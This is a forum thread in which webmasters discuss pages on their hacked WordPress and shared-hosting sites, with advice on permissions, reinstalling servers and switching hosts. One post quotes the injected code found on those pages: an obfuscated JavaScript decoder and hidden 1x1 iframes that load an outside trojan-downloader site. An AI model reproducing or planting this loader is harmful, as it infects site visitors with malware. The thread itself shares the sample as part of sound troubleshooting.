I keep getting hacked...

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • RevSand
    Confirmed User
    • Oct 2003
    • 8151

    #51
    For those in the know who might have some ideas since I have seen this shit on at least a half dozen sites that are all running diff configs and scripts, here is the coding that seems to get attached to parts of the page..

    <script language="JavaScript">e = '0x00' + '3D';str1 = "%86%DE%D5%C8%A2%CF%CE%C5%D6%D9%81%9C%C8%D5%CF %D5% DC%D5%D6%D5%CE%C5%84%DA%D5%DE%DE%D9%D0%9C%80%86%D5 %D8%CC%DD%D1%D9%A2%CF%CC%DF%81%9C%DA%CE%CE%D2%84%9 3%93%DF%D6%C8%DF%D0%CE%90%DF%D3%D1%93%CE%CC%D8%93% 9C%A2%CB%D5%DE%CE%DA%81%8D%A2%DA%D9%D5%DB%DA%CE%81 %8D%80%86%93%D5%D8%CC%DD%D1%D9%80%86%93%DE%D5%C8%8 0";str=tmp='';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCha rCode((tmp.charCodeAt(0)^e)-127);}document.write(str);</script><iframe src='http://uniqcount.net/adv/066/new.php' width=1 height=1></iframe><iframe src='http://uniqcount.net/adv/new.php?adv=66' width=1 height=1></iframe>
    Or some shit similar...


    BadBitchesGoodWeed


    Hire me for all your video shooting needs!!
    Skype = RevSandx

    Comment

    • FelixFlow
      Confirmed User
      • Nov 2004
      • 2779

      #52
      Originally posted by BusterPorn
      He said he had issues on his page and you clicked the link. He is trying to get it sorted out. If your pc is not protected why click a link when it is typed out that it has issues he is seeking help to fix?


      he said his page was getting hacked

      he didnt fucking say there is a virus on his page that will spread to other users that visit his page



      ICQ: 643 339 687

      Comment

      • LiveDose
        Show Yer Tits!
        • Feb 2002
        • 25792

        #53
        The script kiddies creating this shit should be hunted down and killed.

        Scammer Alert: acer19 acer [email protected] [email protected] Money stolen using PayPal

        Comment

        • cess
          Confirmed User
          • Sep 2006
          • 2921

          #54
          Originally posted by HairToStay
          If you don't know how, ask your host to read Apache logs to see what was compromised and how.

          Then, change hosts to someone who will actually help you.
          Which host would you suggest? I always see people suggesting webair around here.

          Comment

          • RevSand
            Confirmed User
            • Oct 2003
            • 8151

            #55
            Originally posted by cess
            Which host would you suggest? I always see people suggesting webair around here.
            I think this BS is across the board... I have heard of it on at least 3 diff hosts that all have goof reputations..


            BadBitchesGoodWeed


            Hire me for all your video shooting needs!!
            Skype = RevSandx

            Comment

            • L0rdJuni0r
              Confirmed User
              • Oct 2004
              • 5883

              #56
              these virus things scare me....
              Affordable video and picture editing.
              junior[at]jampackproductions[DOT]com
              ICQ: 605429331

              Comment

              • RobV
                Confirmed User
                • Oct 2005
                • 111

                #57
                Originally posted by LiveDose
                The script kiddies creating this shit should be hunted down and killed.
                I agree.
                ICQ: 619221

                Comment

                • SinSational
                  Confirmed User
                  • Oct 2004
                  • 1723

                  #58
                  this has happened to a couple customers of ours.

                  the first issue was that the customer had WordPress installed and was using some 3rd party template or counter which was inserting a javascript trojan downloader in to the page on the fly. once the customer removed the template/counter, the issue went away.

                  the second issue was permissions. the customer had some script running with a file owned by apache.apache and 777. once we changed the permissions the javascript trojan went away, and the iframe insertion to uniqcontent went away as well.

                  contact me if you have any other questions.

                  ICQ# 273099174 - monthly specials - 2 Month Free Credit on All Plans - 100% Referrals - chris@ for details
                  Virtual from $14.95/month, Dedicated from $149.95/month
                  Dual-Core Xeon > 1000GB @ $149.95 | 1500GB @ $169.95 | 10Mbps @ $269.95

                  Comment

                  • RobV
                    Confirmed User
                    • Oct 2005
                    • 111

                    #59
                    Originally posted by SinSational
                    this has happened to a couple customers of ours.

                    the first issue was that the customer had WordPress installed and was using some 3rd party template or counter which was inserting a javascript trojan downloader in to the page on the fly. once the customer removed the template/counter, the issue went away.

                    the second issue was permissions. the customer had some script running with a file owned by apache.apache and 777. once we changed the permissions the javascript trojan went away, and the iframe insertion to uniqcontent went away as well.

                    contact me if you have any other questions.
                    I think I will be contacting you shortly. You wouldn't mind another customer would you?
                    ICQ: 619221

                    Comment

                    • SinSational
                      Confirmed User
                      • Oct 2004
                      • 1723

                      #60
                      Originally posted by RobV
                      I think I will be contacting you shortly. You wouldn't mind another customer would you?
                      of course not.

                      from what you pasted above for the code, it definitely sounds like wrong permissions on some of your files. for wordpress i believe it should be:

                      Folders => 755
                      Files => 644

                      ICQ# 273099174 - monthly specials - 2 Month Free Credit on All Plans - 100% Referrals - chris@ for details
                      Virtual from $14.95/month, Dedicated from $149.95/month
                      Dual-Core Xeon > 1000GB @ $149.95 | 1500GB @ $169.95 | 10Mbps @ $269.95

                      Comment

                      • woj
                        <&(©¿©)&>
                        • Jul 2002
                        • 47882

                        #61
                        get a decent host, if everything is tight on the server, your sites shouldn't get owned even with security bugs in any scripts you may use....
                        Custom Software Development, email: woj#at#wojfun#.#com to discuss details or skype: wojl2000 or gchat: wojfun or telegram: wojl2000
                        Affiliate program tools: Hosted Galleries Manager Banner Manager Video Manager
                        Wordpress Affiliate Plugin Pic/Movie of the Day Fansign Generator Zip Manager

                        Comment

                        • Pipeline Q
                          Confirmed User
                          • Dec 2004
                          • 3891

                          #62
                          bump for this

                          Comment

                          • darksoul
                            Confirmed User
                            • Apr 2002
                            • 4997

                            #63
                            Originally posted by SinSational
                            the second issue was permissions. the customer had some script running with a file owned by apache.apache and 777. once we changed the permissions the javascript trojan went away, and the iframe insertion to uniqcontent went away as well.

                            contact me if you have any other questions.
                            Seriously tho.
                            It doesn't really matter if that file is 777 (some scripts really need that) most php writes that are not run through cgi.
                            The problem is with the script that allows an attacker to execute/upload on your server.
                            1337 5y54|)m1n: 157717888
                            BM-2cUBw4B2fgiYAfjkE7JvWaJMiUXD96n9tN
                            Cambooth

                            Comment

                            • en21
                              Confirmed User
                              • May 2006
                              • 2640

                              #64
                              try what we called antivirus
                              Free Asian Sex : http://www.asian4free.com
                              Free Amateur Sex : http://www.lustamateur.com
                              Free Porn : http://www.mysexbookmark.com
                              Free Sex : http://www.goliathlist.com
                              Free Hardcore : http://www.xlust.com
                              Sex For Free : http://www.sexforfee.com

                              Comment

                              • justsexxx
                                Too lazy to set a custom title
                                • Aug 2001
                                • 13723

                                #65
                                Originally posted by RobV
                                My host is webair. I have asked them 10 times with the responce of, "Its all your fault, nothing is wrong on our end."
                                Great service
                                Questions?

                                ICQ: 125184542

                                Comment

                                • emthree
                                  Dialer Kingpin
                                  • Jun 2003
                                  • 10816

                                  #66
                                  Wow, that's nasty.
                                  I cant believe webair wasent more helpfull.

                                  • Sell Patches & Pills •

                                  Comment

                                  • Verbal
                                    Confirmed User
                                    • Dec 2001
                                    • 3420

                                    #67
                                    I'm having the same problem and have contacted Webair about it twice now. they are 'looking' into it.

                                    Comment

                                    • DateDoc
                                      Outside looking in.
                                      • Feb 2005
                                      • 14243

                                      #68
                                      Where is webair in this thread to try and help out their customer? They seem to manage to make it to every thread that is looking for hosting but not this one?

                                      Comment

                                      • darksoul
                                        Confirmed User
                                        • Apr 2002
                                        • 4997

                                        #69
                                        Originally posted by FelixFlow
                                        he said his page was getting hacked

                                        he didnt fucking say there is a virus on his page that will spread to other users that visit his page

                                        switch to FF
                                        1337 5y54|)m1n: 157717888
                                        BM-2cUBw4B2fgiYAfjkE7JvWaJMiUXD96n9tN
                                        Cambooth

                                        Comment

                                        • Hunter_ST
                                          Confirmed User
                                          • Feb 2003
                                          • 763

                                          #70
                                          keep us posted...

                                          Splosh Cash Wet and Messy Fetish Program
                                          I hate to advocate drugs, alcohol, violence, or insanity to anyone, but they've always worked for me.

                                          Comment

                                          • onlineriches
                                            Confirmed User
                                            • Apr 2006
                                            • 308

                                            #71
                                            Not much you can do about it, looks like the virtual hosting box is compromised and this is likely happening to everyones pages on the box.

                                            It probably searches for any web content and adds that into every file.

                                            :/

                                            Comment

                                            • The Duck
                                              Adult Content Provider
                                              • May 2005
                                              • 18243

                                              #72
                                              I have the same problem with my sites on webair, trojan javascript at the top of the page just pops out of nowhere...

                                              WEBAIR SOLVE.
                                              Skype Horusmaia
                                              ICQ 41555245
                                              Email [email protected]

                                              Comment

                                              • darksoul
                                                Confirmed User
                                                • Apr 2002
                                                • 4997

                                                #73
                                                oh, this is a virtual server.
                                                That explains it.
                                                1337 5y54|)m1n: 157717888
                                                BM-2cUBw4B2fgiYAfjkE7JvWaJMiUXD96n9tN
                                                Cambooth

                                                Comment

                                                • RobV
                                                  Confirmed User
                                                  • Oct 2005
                                                  • 111

                                                  #74
                                                  Originally posted by Verbal
                                                  I'm having the same problem and have contacted Webair about it twice now. they are 'looking' into it.
                                                  Since you got webair to look into it, can you have them look into mine as well. YOu must communicate better than I.

                                                  Thank You.
                                                  ICQ: 619221

                                                  Comment

                                                  • E$_manager
                                                    Too lazy to set a custom title
                                                    • Apr 2006
                                                    • 13557

                                                    #75
                                                    Ask your hosting.
                                                    Enjoy more sales with EnjoyBucks!
                                                    Homemade: Asian : Ebony : GFs : Voyeur : Nudist : Public : 3D

                                                    Comment

                                                    • DateDoc
                                                      Outside looking in.
                                                      • Feb 2005
                                                      • 14243

                                                      #76
                                                      did u get it fixed?

                                                      Comment

                                                      • SinSational
                                                        Confirmed User
                                                        • Oct 2004
                                                        • 1723

                                                        #77
                                                        Originally posted by BusterPorn
                                                        did u get it fixed?
                                                        yeah, wondering if you got this squared away.

                                                        ICQ# 273099174 - monthly specials - 2 Month Free Credit on All Plans - 100% Referrals - chris@ for details
                                                        Virtual from $14.95/month, Dedicated from $149.95/month
                                                        Dual-Core Xeon > 1000GB @ $149.95 | 1500GB @ $169.95 | 10Mbps @ $269.95

                                                        Comment

                                                        • gooddomains
                                                          Too lazy to set a custom title
                                                          • Jul 2003
                                                          • 10127

                                                          #78
                                                          redo your complete server setup (including OS install) and the problems will go away.

                                                          Comment

                                                          • teomaxxx
                                                            Confirmed User
                                                            • May 2003
                                                            • 2737

                                                            #79
                                                            anyone on webair knows more about it?
                                                            i found some of my domains hosted on webair hacked too (only root index.php files although)...not sure if its coming from my computer or it was some hack of webair accounts.

                                                            Comment

                                                            • RobV
                                                              Confirmed User
                                                              • Oct 2005
                                                              • 111

                                                              #80
                                                              I started a new thread.
                                                              ICQ: 619221

                                                              Comment

                                                              • Gillespie
                                                                Confirmed User
                                                                • Aug 2006
                                                                • 1391

                                                                #81
                                                                Whenever a server has been compromised, it is best to start from scratch. Reinstall the OS, reupload everything, import dbs.

                                                                The attacker might have left stuff on there that you didn't catch. That's why, in most cases, it happens over and over again.

                                                                So my advice is that you format your server, start from scratch and search the web for security information of every single script or software that you plan to put on there.
                                                                Blue Design Studios
                                                                My choice for web design.
                                                                Click this to see why.


                                                                Get a REAL host. Try JaguarPC.

                                                                294-659-259

                                                                Comment

                                                                • Violetta
                                                                  Affiliate
                                                                  • Jul 2004
                                                                  • 28735

                                                                  #82
                                                                  this shit sucks... I working on the wordpress chmod now! Also installing the latest version.
                                                                  M&A Queen

                                                                  Comment

                                                                  • emthree
                                                                    Dialer Kingpin
                                                                    • Jun 2003
                                                                    • 10816

                                                                    #83
                                                                    Originally posted by Rockatansky
                                                                    this shit sucks... I working on the wordpress chmod now! Also installing the latest version.
                                                                    I have the latest WPVersion, and still the same shit.

                                                                    • Sell Patches & Pills •

                                                                    Comment

                                                                    • emthree
                                                                      Dialer Kingpin
                                                                      • Jun 2003
                                                                      • 10816

                                                                      #84
                                                                      RobV what is the status on your situation?

                                                                      • Sell Patches & Pills •

                                                                      Comment

                                                                      • JD
                                                                        Too lazy to set a custom title
                                                                        • Sep 2003
                                                                        • 22651

                                                                        #85
                                                                        buuuuump just got hit AGAIN today

                                                                        Comment

                                                                        • RobV
                                                                          Confirmed User
                                                                          • Oct 2005
                                                                          • 111

                                                                          #86
                                                                          Originally posted by emthree
                                                                          RobV what is the status on your situation?
                                                                          Webair changed my password (however my original password was VERY strong). Since the second password change I have not been hacked.
                                                                          And oddly enough this only hit 1 blog I had on the server, everything else was untouched.
                                                                          ICQ: 619221

                                                                          Comment

                                                                          • cosis
                                                                            Confirmed User
                                                                            • Aug 2001
                                                                            • 5292

                                                                            #87
                                                                            Originally posted by RobV
                                                                            My host is webair. I have asked them 10 times with the responce of, "Its all your fault, nothing is wrong on our end."
                                                                            same thing happened to me, my host was CANDID HOSTING though, got the same reply from them......... So I said fuck you and switched hosts. Haven't had any problems since.
                                                                            Last edited by cosis; 11-20-2006, 09:03 AM.

                                                                            Comment

                                                                            • Ange
                                                                              Registered User
                                                                              • Jan 2006
                                                                              • 44

                                                                              #88
                                                                              trojan alert!!!!!!

                                                                              Comment

                                                                              • Big_Red
                                                                                Confirmed User
                                                                                • Jun 2006
                                                                                • 4147

                                                                                #89
                                                                                Originally posted by RobV
                                                                                Yeah I am reading about that, the only thing that gets me is I have Norton Internet Security (and virus scanner) and I have the most up to date definitions and its not pulling anything on the sytem (yet I do still think its on my comp) Any ideas?

                                                                                Secondly I have asked webair for help, honestly about 5 times with the same reply of "nothing we can do, its all on you, make sure your wordpress is uptodate."
                                                                                yeh, first ditch Norton and get a real Antivirus.
                                                                                60% Revshare.
                                                                                http://www.boobycash.com We got the boobs and the cash!
                                                                                ICQ 198-580-197 24/7 support

                                                                                Comment

                                                                                Working...